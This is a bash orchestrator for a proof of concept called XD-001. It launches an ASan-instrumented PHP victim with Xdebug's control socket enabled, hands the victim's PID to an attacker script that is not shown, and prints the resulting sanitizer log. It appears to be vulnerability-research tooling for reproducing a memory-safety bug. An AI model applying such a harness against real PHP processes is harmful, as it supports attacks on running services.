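#!/usr/bin/env bash
# XD-001 PoC orchestrator. See README.txt for prerequisites.
#
# Starts victim.php in the background under the PHP binary named by $PHP with
# Xdebug loaded, reads the victim's PID from its output, passes that PID to
# attacker.php, waits for the victim to exit and prints the tail of its log.
#
# Exit codes: 2 = a prerequisite is missing, 3 = the victim never printed
# its PID.
#
# Edit these three paths to match your environment:
PHP=${PHP:-/home/ilia/php-src-8.4/sapi/cli/php}
XDEBUG_SO=${XDEBUG_SO:-/home/ilia/xdebug/modules/xdebug.so}
ATTACKER_PHP=${ATTACKER_PHP:-php}

set -u

HERE=$(dirname -- "$0")

# Extra 0.2 s polls made after the initial one-second grace period while
# waiting for the victim to report its PID (default: about 5 s more).
VICTIM_WAIT_TRIES=${VICTIM_WAIT_TRIES:-25}

VICTIM_OUT=""
VICTIM_BG=""

# Print the first "pid=<n>" number found in the victim's output, if any.
read_victim_pid() {
  grep -oE 'pid=[0-9]+' "$VICTIM_OUT" | head -n 1 | cut -d= -f2
}

# Runs on every exit path: stop a victim that is still running so no
# instrumented process is left behind, then delete the temporary log.
cleanup() {
  if [ -n "$VICTIM_BG" ]; then
    kill "$VICTIM_BG" 2>/dev/null || true
  fi
  if [ -n "$VICTIM_OUT" ]; then
    rm -f -- "$VICTIM_OUT"
  fi
}
trap cleanup EXIT

# Prerequisite checks; diagnostics go to stderr.
if [ ! -x "$PHP" ]; then
  echo "PHP=$PHP not executable" >&2
  exit 2
fi
if [ ! -f "$XDEBUG_SO" ]; then
  echo "XDEBUG_SO=$XDEBUG_SO not found" >&2
  exit 2
fi
if ! command -v "$ATTACKER_PHP" >/dev/null; then
  echo "ATTACKER_PHP=$ATTACKER_PHP not found in PATH" >&2
  exit 2
fi

# mktemp gives an unpredictable, owner-only file for the victim's output.
if ! VICTIM_OUT=$(mktemp); then
  echo "mktemp failed" >&2
  exit 2
fi

echo "spawning ASan-instrumented victim ..."
# detect_leaks=0 silences leak reports; abort_on_error=0 and halt_on_error=0
# ask ASan not to stop at the first report, so the whole trace reaches the log.
ASAN_OPTIONS=detect_leaks=0:abort_on_error=0:halt_on_error=0:print_stacktrace=1 \
  "$PHP" \
  -d zend_extension="$XDEBUG_SO" \
  -d xdebug.mode=develop \
  -d xdebug.control_socket=default \
  "$HERE/victim.php" \
  >"$VICTIM_OUT" 2>&1 &
VICTIM_BG=$!

# Wait for the victim to print its PID and bind the socket. The original
# one-second grace period is kept; after it, keep polling for a bounded time
# because an ASan build can take longer than a second to start.
sleep 1
PID=$(read_victim_pid)
tries=0
while [ -z "$PID" ] && [ "$tries" -lt "$VICTIM_WAIT_TRIES" ]; do
  # Stop polling once the victim has exited; its output cannot grow further.
  if ! kill -0 "$VICTIM_BG" 2>/dev/null; then
    PID=$(read_victim_pid)
    break
  fi
  sleep 0.2
  tries=$((tries + 1))
  PID=$(read_victim_pid)
done

if [ -z "$PID" ]; then
  echo "victim never printed its PID. Output:" >&2
  cat -- "$VICTIM_OUT" >&2
  exit 3 # the EXIT trap stops the victim and removes the log
fi
echo "victim pid=$PID"

echo
echo "running attacker ..."
"$ATTACKER_PHP" "$HERE/attacker.php" "$PID"

# Let the victim finish so ASan flushes its log.
wait "$VICTIM_BG" 2>/dev/null
# The victim has been reaped; clear the PID so cleanup cannot signal an
# unrelated process that later reuses the same number.
VICTIM_BG=""

echo
echo "---ASan victim log (tail) ---"
tail -n 80 -- "$VICTIM_OUT"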